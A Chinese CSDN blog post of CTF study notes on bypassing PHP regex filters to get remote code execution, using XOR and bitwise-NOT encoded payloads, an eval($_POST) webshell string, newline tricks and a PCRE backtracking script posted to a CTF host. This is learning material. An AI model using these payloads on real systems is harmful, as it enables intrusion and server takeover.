正则匹配绕过总计之[极客大挑战 2019]RCE ME

已于 2022-08-25 23:16:23 修改
阅读量1.5k 收藏 10
点赞数 2
分类专栏: CTF知识点 文章标签: 安全
于 2022-08-23 00:14:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/126475942
版权

知识点:

参考以及总结大全:浅谈PHP代码执行中出现过滤限制的绕过执行方法_末 初的博客-CSDN博客_php代码执行绕过

正则匹配绕过:

分为无参数(把字母和数字都禁了)

有参数(只禁用某些函数例如system)

绕过:

异或绕过:

脚本:(如果ban了数字和字母就可以用这个脚本生成,但是长度会很长,对长度没有要求就可以用这个)

payload = "assert"
strlist = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 93, 94, 95, 96, 123, 124, 125, 126, 127]
#strlist是ascii表中所有非字母数字的字符十进制
str1,str2 = '',''

for char in payload:
    for i in strlist:
        for j in strlist:
            if(i ^ j == ord(char)):
                i = '%{:0>2}'.format(hex(i)[2:])
                j = '%{:0>2}'.format(hex(j)[2:])
                print("('{0}'^'{1}')".format(i,j),end=".")
                break
        else:
            continue
        break

比如assert   

('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c')

 没有ban数字和字母:脚本:

import string

char = string.printable
cmd = 'assert'
tmp1,tmp2 = '',''
for res in cmd:
    for i in char:
        for j in char:
            if(ord(i)^ord(j) == ord(res)):
                tmp1 += i
                tmp2 += j
                print(tmp1)
                print(tmp2)
                break
        else:
            continue
        break
print("('{}'^'{}')".format(tmp1,tmp2))

结果:

('000000'^'CICDU]')

 另外还有一个,_GET 的异或获取为:${_GET}[_] -->  ${%fe%fe%fe%fe^%a1%b9%bb%aa}[_]

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

//${_GET}{%ff}();&%ff=phpinfo

 如果要其他rce就可以根据这个来构造,比如:

${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=eval($_POST[%27a%27])

//${_GET}[_](${_GET}[__]);&_=assert&__=eval($_POST[%27a%27])

 取反编码绕过

php上传木马脚本:

<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[mochu7]))';
$d=urlencode(~$c);
echo $d;
 ?>

生成后使用:

(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%92%90%9C%97%8A%C8%A2%D6%D6);

有参数时,可以直接url编码取反 system 

var_dump(urlencode(~'system'));
var_dump(urlencode(~'whoami'));

(~%8C%86%8C%8B%9A%92)(~%88%97%90%9E%92%96);
#system('whoami');
 

当匹配为含有^ $时可以采用换行绕过:
^test表示匹配的字符以 test开头

test$表示匹配的字符以test结尾

^test$ 理论表示匹配的字符只能是test

但是正则匹配不匹配换行符号:可以用%0a (表示换行符号)来绕过:test%0a

.不会匹配换行符,如

if (preg_match('/^.*(flag).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
}

只需要 $json="\nflag"

而在非多行模式下,$似乎会忽略在句尾的%0a

if (preg_match('/^flag$/', $_GET['a']) && $_GET['a'] !== 'flag') {
echo $flag;
}

只需要传入?a=flag%0a

回溯绕过

参考:

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌

 简单来说就是正则表达式匹配的时候某个.*将后面的字符全部匹配到了,导致表达式后面的式子没有地方匹配,因此一个一个字符吐出来,直到后面的式子全部匹配完毕或者回溯次数过多导致正则直接返回false

例如[FBCTF2019]RCEService

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

注意正则匹配中的 ^.*    .*$       .*就可以使用回溯,怎么回溯呢,脚本:

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","test":"' + "a"*(1000000) + '"}'
res = requests.post("http://ad66432f-4628-41f6-8190-d9b9c247904c.node3.buuoj.cn/", data={"cmd":payload})
#print(payload)
print(res.text)

由于这里传递的rce是以json 格式的,所以是{"cmd":"ls"}格式;

这里还有^ $ 可以用%0a绕过;

{%0a"cmd":"ls /home/rceservice/"%0a}  发现flag

{%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}   打开flag 为什么cat还要加/bin  是因为

系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件怎么执行系统命令

因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面

例题参考:[极客大挑战 2019]RCE ME(取反、异或绕过正则表达式、bypass disable_function)_WHOAMIAnony的博客-CSDN博客_取反绕过 

一只Traveler
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
wps表格excel正则工具,excel正则表达式替换/匹配/查找/搜索/提取数字
01-19
Excel正则小工具? ● 正则提取,替换,定位,筛选 ● 一个Excel、Wps表格内容处理的效率脚本程序 ● 初始热键Win + z(可自定义修改) 如果你办公时经常使用 Office 的 Excel 或 WPS 表格,并且经常需要处理数据,那么相信这款由 sixtyone 原创开发的「Excel 正则工具」插件也许会帮你一个超级大忙! Excel、WPS 表格一直没有正则功能,对于有大 “批量” 处理数据需求的打工人士来说真的很无奈。而本软件正是把强大的正则功能完美地添加到表格中,让 Excel、WPS 支持正则表达式的搜索、匹配提取、替换、定位等,让数据处理能力进化一个层次! 让 Office Excel、WPS 表格支持正则表达式的免费插件:「Excel 正则工具」顾名思义,需要使用 “正则表达式(PCRE)” 的知识来进行操作,对于完全没有接触过正则的朋友也许有一定的入门门槛,但正则实在是太过强大灵活好用了,如果能学习掌握,必然是能受益终身的!正则的好处是它非常的通用,你并非只在 Office 办公软件里受益,而是在任何支持正则的文本编辑器 (
python正则表达式与回溯绕过waf
好好睡觉
01-13 967
python正则表达式、正则表达式示例、正则限定密码、正则断言、正则回溯绕过
Linux Shell编程-正则表达式
qq_43149127的博客
09-11 498
正则表达式要要匹配的内容应该有头有尾,就是说要匹配的的区间应把的的前面部分和后面部分都写出来,匹配的字符串才会更加准确 例如相匹配有a的意思就是匹配内容有无数个a或者没有a的行**a的实际匹配内容是全部内容** **.**就是匹配任意一个字符 以a开头就是^a 以a结尾就是a& [^]的意思就是括号里面的内容取反进行匹配 匹配空白行grep -n “^&” 文件名 找出文件中的...
PHP正则绕过解析
qq_56845076的博客
08-03 1131
PHP的回溯,和NULL与False比较
BUUCTF:[极客挑战 2019]RCE ME ——两种方法
m0_62879498的博客
05-16 3540
BUUCTF:[极客挑战 2019]RCE ME 打开环境是 代码审计题 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
[极客挑战 2019]RCE ME(取反、异或绕过正则表达式、bypass disable_function)
热门推荐
qq_45521281的博客
04-21 1万+
题目进去后,很简单的代码,显然命令执行: 但是得要先绕过preg_match()中正则表达式的限制,一开始傻乎乎的直接传了个数组,妄图绕过preg_match(),这很显然是不行的。 附上大佬的文章:关于PHP正则的一些绕过方法 ...
[极客挑战 2019]RCE ME buuctf 题目详解思路
weixin_73560599的博客
08-31 641
非常经典的无字母数字RCE 且这套题目加了些过滤条件 不是特别难 只是有个disable_function 是需要注意的
[极客挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置
m0_64180167的博客
09-22 684
有意思。。。。过滤了数字字母我们要绕过并且执行rce这里使用取反和异或都可以。
BUUCTF[极客挑战 2019]RCE ME
qq_62078839的博客
03-11 2786
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } ...
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。...
CVE-2019-19781 Citrix Application Delivery Controller和RCE.MD
04-13
CVE-2019-19781 Citrix Application Delivery Controller和RCE
jackson-rce-via-two-new-gadgets:两种不同的小工具绕过jackson-databind中的RCE黑名单
05-14
现在在该项目中,您将看到如何使用两个不同的小工具绕过该黑名单并成功利用RCE漏洞。 MITER为此问题分配了CVE-2018-5968。受影响的版本从2.8.11和2.9.x到2.9.3减轻此问题已在2.9.4中修复。 因此,只需更新到最新...
php rce绕过
m0_73973498的博客
10-08 2047
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
正则表达式案例分析 (一)
weixin_34318326的博客
07-11 253
前言 最近在重新学习正则表达式,把在学习过程中所遇到的案例,还有比较难理解概念用自己的理解分析并整理总结。 如有哪些地方不对,欢迎指正,谢谢!(๑•ᴗ•๑) 本系列使用的JavaScript所支持的正则表达式语法,并推荐你使用 regexr.com/ 去做相应的练习。 假定你已经熟悉元字符,方括号,修饰符,量词及RegExp对象。 如果没有,请先看一遍文档www.w3school.com.cn/j...
关于正则匹配preg_match(‘/^O:\d+/‘)的绕过的几种方法
m0_63138919的博客
10-13 1859
本文为preg_match('/^O:d+/')正则 匹配绕过的方法
正则表达式及绕过案例
lin152235的博客
07-21 1022
对正则表达式进行绕过,如果要绕过你需要在from前面不要出现不是单词边界,手动加入会报语法错误,所以这里需要考虑mysql中的科学计数法1e1来进行注入绕过,但是还是会出现一个问题就是使用科学计数法来进行查询会占一列,但是前面说到这个users中只有3列超过就会报错,所以直接使用group_concat来进行绕过,因为只能显示3列所以,我们将1,group_concat(…由orderby可以知道这个表一共有3列,那么我们就可以查看2,3列;可以看的出来,第二列存储的是登录密码,第三列是密码。...
preg_match函数,正则匹配绕过
SsMing的博客
12-27 1万+
以ichunqiu欢乐赛为例子 1.通过.swp 文件恢复出php脚本 vi index.php.swp recover 2.第一关源码为 &lt;?php function areyouok($greeting){    return preg_match('/Merry.*Christmas/is',$greeting); } $greeting=@$_POST['greetin...
ctfshow RCE极限挑战
最新发布
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的控制。其中,ctfshow是一个POST参数,用于接收选手注入的代码。如果选手注入的代码中包含恶意代码,就可以实现RCE攻击。这个挑战的难度较高,需要选手具备一定的安全知识和技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值